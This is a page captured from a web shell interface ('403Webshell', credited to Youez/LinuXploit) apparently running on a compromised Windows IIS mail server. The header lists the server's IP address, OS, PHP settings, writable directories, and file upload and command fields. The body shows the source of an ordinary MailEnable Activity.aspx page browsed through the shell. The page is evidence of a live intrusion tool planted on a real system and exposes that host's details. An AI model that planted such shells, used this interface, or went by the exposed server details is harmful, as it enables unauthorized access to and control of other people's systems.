403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Program Files (x86)/Mail Enable/Bin/NETWebMail/Mondo/lang/sys/Forms/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Program Files (x86)/Mail Enable/Bin/NETWebMail/Mondo/lang/sys/Forms//Activity.aspx
<%@ Page Language="vb" AutoEventWireup="false" CodeBehind="Activity.aspx.vb" Inherits="MailEnable.Clients.WebMail.Mondo.Activity" %>
<%@ Register TagPrefix="uc1" TagName="uscStyleHeader" Src="../../Controls/uscStyleHeader.ascx" %>
<%@ Register TagPrefix="uc3" TagName="uscPageBorder_Start" Src="../../Controls/uscPageBorder_Start.ascx" %>
<%@ Register TagPrefix="uc4" TagName="uscPageBorder_End" Src="../../Controls/uscPageBorder_End.ascx" %>
<%@ Register TagPrefix="uc1" TagName="ScriptsInclude" Src="../../Controls/ScriptsInclude.ascx" %>
<%@ Register TagPrefix="uc2" TagName="uscLanguageTokenMondo" Src="../../Controls/uscLanguageToken.ascx" %>
<uc2:uscLanguageTokenMondo id="uscToken" runat="server"></uc2:uscLanguageTokenMondo>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title><%=uscToken.GetText("[ME_TXT-ActivityViewer]")%></title>
    <meta name="ROBOTS" content="NOINDEX,NOFOLLOW">
	<meta http-equiv="content-type" content="text/html;charset=UTF-8">
	<uc1:uscStyleHeader id="UscStyleHeader1" runat="server"></uc1:uscStyleHeader>
	<uc1:ScriptsInclude id="ScriptsInclude" runat="server"></uc1:ScriptsInclude>
	
	<!--[if lte IE 7]>
    <style type="text/css">
        .bttn_toolbar_primary_left        {float:left;}
        .bttn_toolbar_primary_right       {float:left;}
        .bttn_dropDown_right              {float:left;}
    </style>
    <![endif]-->
    
    <script type="text/javascript">
    <!--

        $(document).ready(function() {
            InitLayout();
            window.onload = PageLoad;
        });

        function InitLayout() {
            var html_height = $('html').height();
            var toolbar_height = $('#toolbar_primary_js').height();
            var paneiframe_padding = 0;
            
            if (html_height > 0) {
                $('body div.level0_shell').height(html_height);
            }

            if ($('.pane-iframe').css('padding-top')) {
                paneiframe_padding = $('.pane-iframe').css('padding-top').replace('px', '');
            }

            <%If MailEnable.Web.Utilities.UseSummaryToolBar(Request,Session) Then %>
                //need either paneiframe_padding (which is 37) as 7 or do not remove the toolbar_height (which is 30)
                //I think it currently works because the height of the old toolbar was 73 (which is almost 2x37).
                toolbar_height = 0;
            <%End If %>

            document.getElementById("statList_shell_js").style.height = html_height - paneiframe_padding - toolbar_height + "px";
        }

        function doRefresh() {
            //reload the graph frame if visible.
		    try
		    {            
                window.parent.frames['ifGraph'].location.reload();
            } catch (e) { return true; }
            window.location.reload();
        }

        function BrowserResize() {
            InitLayout();
        }
        
        function PageLoad() {
            addEvent(window, 'resize', BrowserResize, true);
        }
    -->
    </script>
    
    <style type="text/css">
        .ActivityData {
          border-collapse: collapse;
        }
        .ActivityData td {
          border: 1px solid lightgrey;
          padding-top:2px;
          padding-bottom:2px;
        }
    </style>
</head>

<body onload="PageLoad()" class="pane-iframe activity">
    <form runat="server" id="pageform">   
		
            <table class="body_shell_table" border="0" cellspacing="0" cellpadding="0">
                <tr>
                    <td class="bodyCol_contactsList">
                        <div class="toolbar_primary stats" id="toolbar_primary_js">
                            <table class="toolbar_primary_table stats" border="0" cellspacing="0" cellpadding="0">
                              <tr>
                                <td class="toolbar_primary_table_left">
                                    <div class="toolbar_primary_bttns_td_shell">
                                    </div><!-- toolbar_primary_bttns_td_shell -->
                                </td>
                                <td class="toolbar_primary_table_left_bttn" id="toolbar_primary_bttn_filterTasks_js">
                                    <!-- Filter Activity -->
                                    <!--
                                    
                                    <div class="bttn_dropDown_float_right" id="bttn_dropDown_filterTasks" onclick="dropDown_toggleDisplay('dropDown_filter')">
                                       <div class="bttn_dropDown_left" onselectstart="return false;">Filter Actions</div>
                                       <div class="bttn_dropDown_right"></div>
                                    </div>
                                    <div class="clear_div"></div>
                                    -->
                                    
                                    <!-- Drop down menu: Filter Activity -->
                                    
                                    <!--
                                    <div class="dropDown_shell_right" id="dropDown_filter" onmouseover="dropDown_over('dropDown_filter')" onmouseout="dropDown_out(event, 'dropDown_filter')">
                                       <ul>
                                          <div class="dropDown_item" onclick="dropDown_ToggleSelection(this, 'dropDown_filter');"><li class="dropDown_icon_tick" id="li_all">All Activity</li></div>
                                          <div class="dropDown_item" onclick="dropDown_ToggleSelection(this, 'dropDown_filter');"><li class="dropDown_icon_blank" id="li_sent">Messages Sent</li></div>
                                          <div class="dropDown_item" onclick="dropDown_ToggleSelection(this, 'dropDown_filter');"><li class="dropDown_icon_blank" id="li_system">System Actions</li></div>
                                          <div class="dropDown_item" onclick="dropDown_ToggleSelection(this, 'dropDown_filter');"><li class="dropDown_icon_blank" id="li_recv">Messages Received</li></div>
                                          <div class="dropDown_item" onclick="dropDown_ToggleSelection(this, 'dropDown_filter');"><li class="dropDown_icon_blank" id="li_spam">Spam Detected</li></div>
                                       </ul>
                                    </div>
                                    -->
                                </td>
                                <td class="toolbar_primary_table_bttn stats">
                                    <!-- Bttn Refresh -->                            
                                    <div class="bttn_toolbar_primary_shell_right" onselectstart="return false;" onclick="doRefresh()" title="Refresh List">
                                        <div class="bttn_toolbar_primary_left">
                                            <div class="toolbar_icon_refresh"></div>
                                        </div>
                                        <div class="bttn_toolbar_primary_right"></div>
                                    </div>
                                </td>
                              </tr>
                            </table><!--toolbar_primary_table -->
                       </div><!-- toolbar_primary -->
                        
                        <div id="statList_shell_js" class="dataTable_shell stats">
                            <table class="options_form_table stats" border="0" cellpadding="0" cellspacing="0">
                                 <tr>
                                    <td style="width:20px;">
                                        <div class="toolbar_label" style="height:19px;padding:3px 20px 0px 7px;white-space:nowrap;"><%=uscToken.GetText("[ME_TXT-Displaylogsfrom]")%>:</div>
                                    </td>
                                    <td align="left">
                                        <asp:DropDownList runat="server" class="select" onchange="document.getElementById('pageform').submit();" ID="optEventsDay" style="width:auto;">
                                        </asp:DropDownList>
                                    </td>
                                </tr>
                            </table>
                            <table class="dataTable_shell_table stats">
                                <tr>
                                    <td colspan="2" width="100%" nowrap="nowrap" style="padding-top:0px">
                                        <div style="width:100%">
                                            <asp:Repeater runat="server" ID="lstEvents">
                                                <HeaderTemplate>
                                                    <table width="100%" class="ActivityData">
                                                       <%-- <tr>
                                                            <td>Time</td>
                                                            <td>Event</td>
                                                        </tr>--%>
                                                </HeaderTemplate>
                                                <ItemTemplate>
                                                    <tr>
                                                        <td><%#DataBinder.Eval(Container.DataItem, "Event")%></td>
                                                    </tr>
                                                </ItemTemplate>
                                                <AlternatingItemTemplate>
                                                    <tr>
                                                        <td><%#DataBinder.Eval(Container.DataItem, "Event")%></td>
                                                    </tr>
                                                </AlternatingItemTemplate>
                                                <FooterTemplate>
                                                    </table>
                                                </FooterTemplate>
                                            </asp:Repeater>
                                        </div>
                                    </td>
                                </tr>
                            </table>
                                            
                        </div>
                    </td>
                </tr>
                </table>
		    

    </form>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit